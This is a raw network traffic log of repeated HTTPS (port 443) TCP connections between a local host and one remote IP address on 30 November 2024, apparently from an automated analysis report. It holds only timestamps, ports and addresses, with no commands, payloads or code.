Nov 30, 2024 12:48:37.852622032 CET	443	49839	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:37.912581921 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:37.912873983 CET	49840	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:37.912884951 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:37.913300991 CET	49840	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:37.913305998 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124115944 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124145031 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124224901 CET	49836	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.124238968 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124417067 CET	49836	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.124505043 CET	49836	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.124511003 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124524117 CET	49836	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.124653101 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124682903 CET	443	49836	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.124718904 CET	49836	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.128145933 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.128165960 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.128237009 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.128379107 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.128390074 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.258274078 CET	443	49838	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.261363983 CET	443	49838	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.261456966 CET	49838	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.261478901 CET	49838	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.261478901 CET	49838	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.261492968 CET	443	49838	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.261501074 CET	443	49838	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.263392925 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.263446093 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.263499022 CET	49837	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.263516903 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.263756037 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.263789892 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.263859034 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.263891935 CET	49837	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.263891935 CET	49837	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.263905048 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.264287949 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.264369011 CET	443	49837	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.264420033 CET	49837	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.264731884 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.264748096 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.266204119 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.266222000 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.266302109 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.266426086 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.266438961 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.286386967 CET	443	49839	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.286654949 CET	443	49839	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.286711931 CET	49839	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.286890030 CET	49839	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.286890030 CET	49839	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.286900997 CET	443	49839	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.286909103 CET	443	49839	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.288681984 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.288700104 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.288785934 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.288913965 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.288925886 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.356664896 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.360054970 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.360111952 CET	49840	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.360156059 CET	49840	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.360163927 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.360174894 CET	49840	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.360178947 CET	443	49840	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.362093925 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.362117052 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:38.362204075 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.362325907 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:38.362335920 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:39.908205032 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:39.908648014 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:39.908660889 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:39.909183979 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:39.909188986 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.047563076 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.048048019 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.048067093 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.048662901 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.048669100 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.059355021 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.059739113 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.059770107 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.060144901 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.060151100 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.069392920 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.069736004 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.069752932 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.070111990 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.070117950 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.142689943 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.143028021 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.143035889 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.143412113 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.143415928 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.351917028 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.355513096 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.355577946 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.355612993 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.355623960 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.355633974 CET	49842	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.355638981 CET	443	49842	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.358249903 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.358284950 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.358345985 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.358464956 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.358477116 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.494019032 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.497126102 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.497179031 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.497215986 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.497229099 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.497237921 CET	49843	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.497241974 CET	443	49843	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.499547958 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.499578953 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.499675035 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.499806881 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.499824047 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.502063990 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.505395889 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.505455017 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.505474091 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.505482912 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.505492926 CET	49844	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.505496979 CET	443	49844	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.507230043 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.507257938 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.507323027 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.507420063 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.507433891 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.513272047 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.516586065 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.516634941 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.516676903 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.516690016 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.516699076 CET	49845	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.516704082 CET	443	49845	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.518331051 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.518349886 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.518409014 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.518508911 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.518522978 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.587678909 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.590785980 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.590872049 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.590908051 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.590912104 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.590929031 CET	49846	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.590931892 CET	443	49846	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.592756987 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.592777967 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:40.592849016 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.592973948 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:40.592987061 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.219275951 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.221276045 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.221288919 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.221896887 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.221901894 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.293708086 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.294688940 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.294711113 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.295094967 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.295100927 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.316237926 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.317070961 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.317085028 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.317591906 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.317595005 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.344527960 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.344961882 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.344991922 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.345247030 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.345253944 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.390526056 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.391159058 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.391168118 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.391416073 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.391421080 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.672735929 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.678719044 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.678881884 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.678881884 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.678881884 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.681982040 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.682056904 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.682166100 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.682362080 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.682398081 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.736232996 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.740061998 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.740197897 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.740212917 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.740250111 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.740297079 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.740308046 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.740319014 CET	49849	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.740324020 CET	443	49849	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.742893934 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.742928982 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.742995024 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.743105888 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.743123055 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.753298044 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.757253885 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.757317066 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.757320881 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.757479906 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.761645079 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.761650085 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.761667013 CET	49851	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.761670113 CET	443	49851	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.765543938 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.765583992 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.765665054 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.766352892 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.766379118 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.797909021 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.800981045 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.801028967 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.801080942 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.801095963 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.801109076 CET	49848	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.801115990 CET	443	49848	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.805088043 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.805118084 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.805191040 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.805378914 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.805391073 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.844096899 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.844245911 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.844295025 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.844311953 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.844317913 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.844330072 CET	49850	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.844333887 CET	443	49850	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.846837044 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.846848965 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.846910000 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.846997023 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.847007990 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:42.984833002 CET	49847	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:42.984853983 CET	443	49847	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.462491989 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.464591026 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.464639902 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.465034008 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.465049982 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.503685951 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.504158020 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.504189014 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.504692078 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.504703045 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.520328045 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.520618916 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.520653009 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.520968914 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.520976067 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.528139114 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.528362989 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.528374910 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.528707981 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.528712988 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.625437975 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.628437996 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.628460884 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.628880024 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.628885984 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.907008886 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.907170057 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.907356024 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.907356977 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.907356977 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.910377979 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.910418034 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.910516977 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.910676956 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.910702944 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.938863039 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.938905954 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.939001083 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.939219952 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.939219952 CET	49854	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.939241886 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.939270973 CET	443	49854	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.941294909 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.941332102 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.941407919 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.941535950 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.941545010 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.954719067 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.954869986 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.954901934 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.955024004 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.955024004 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.955024004 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.955024958 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.956885099 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.956928968 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.957003117 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.957113028 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.957140923 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.971853971 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.975478888 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.975538969 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.975708961 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.975708961 CET	49853	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.975718021 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.975725889 CET	443	49853	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.977560997 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.977586985 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:44.977658987 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.977808952 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:44.977823019 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.069082022 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.072613001 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.072678089 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.072715044 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.072730064 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.072738886 CET	49856	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.072745085 CET	443	49856	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.074611902 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.074630022 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.074690104 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.074814081 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.074826002 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.218565941 CET	49852	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.218591928 CET	443	49852	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:45.265448093 CET	49855	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:45.265471935 CET	443	49855	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.690846920 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.691376925 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.691414118 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.691855907 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.691871881 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.722282887 CET	443	49858	13.107.246.63	192.168.2.4
